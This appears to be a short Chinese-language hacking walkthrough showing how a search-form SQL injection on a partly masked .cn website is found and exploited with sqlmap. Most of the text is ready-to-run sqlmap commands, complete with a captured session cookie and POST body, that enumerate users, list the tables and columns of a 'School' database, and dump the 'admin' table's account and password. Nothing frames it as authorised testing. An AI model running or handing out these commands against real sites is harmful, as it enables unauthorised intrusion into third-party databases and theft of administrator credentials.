1、先手工进行判断


2、发现存在搜索型注入


3、进行捉包工作



4、直接放在SQLmap中进行注入

C:\Users\Administrator>C:\sqlmap-dev\sqlmap.py  --cookie="PHPSESSID=ar8nl9v53afk

0sufu081jndge6" --data=" keyword=%B1%BE&login=+%CB%D1%CB%F7+ " -u http://XXX.cn:80/search.php


C:\sqlmap-dev\sqlmap.py --users --dbms=mysql --cookie="PHPSESSID=ar8nl9v53afk0sufu081jndge6" --data=" keyword=%B1%BE&login=+%CB%D1%CB%F7+ " -u http://XXXX.cn:80/search.php 

4、选择其中的一个数据库school进行注入,发现有两个表,并对表的字段进行暴破

C:\Users\Administrator>C:\sqlmap-dev\sqlmap.py --tables -D School --dbms=mysql -

-cookie="PHPSESSID=ar8nl9v53afk0sufu081jndge6" --data=" keyword=%B1%BE&login=+%C

B%D1%CB%F7+ " -u http://XXXX.cn:80/search.php



C:\Users\Administrator>C:\sqlmap-dev\sqlmap.py --columns -T admin -D School --db

ms=mysql --cookie="PHPSESSID=ar8nl9v53afk0sufu081jndge6" --data=" keyword=%B1%BE

&login=+%CB%D1%CB%F7+ " -u http://XXXX.cn:80/search.php



5、获取到admin的账号和密码

C:\Users\Administrator>C:\sqlmap-dev\sqlmap.py --dump-all -T admin -D School --d

bms=mysql --cookie="PHPSESSID=ar8nl9v53afk0sufu081jndge6" --data=" keyword=%B1%B

E&login=+%CB%D1%CB%F7+ " -u http://XXXX.cn:80/search.php